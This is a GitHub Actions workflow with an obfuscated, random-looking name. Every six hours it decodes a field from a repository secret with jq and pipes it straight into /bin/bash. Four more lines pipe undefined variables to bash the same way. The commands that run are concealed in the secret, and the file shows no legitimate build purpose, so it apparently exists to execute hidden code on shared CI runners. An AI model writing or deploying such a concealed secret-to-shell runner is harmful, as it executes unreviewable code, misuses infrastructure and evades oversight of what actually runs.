name: midwifeprosecutor

on:
  workflow_dispatch:
  schedule:
    - cron: '42 2/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: midwifeprosecutor
        env:
          mpkm77: ${{ secrets.mpkm77 }}
        run: |
          echo $mpkm77 | jq -r .oiq78215 | /bin/bash
          echo $in34321 | jq -r .rpt6 | /bin/bash
          echo $iys006 | jq -r .erkal7767 | /bin/bash
          echo $sjqg2510 | jq -r .t375 | /bin/bash
          echo $i74 | jq -r .gfr1940 | /bin/bash

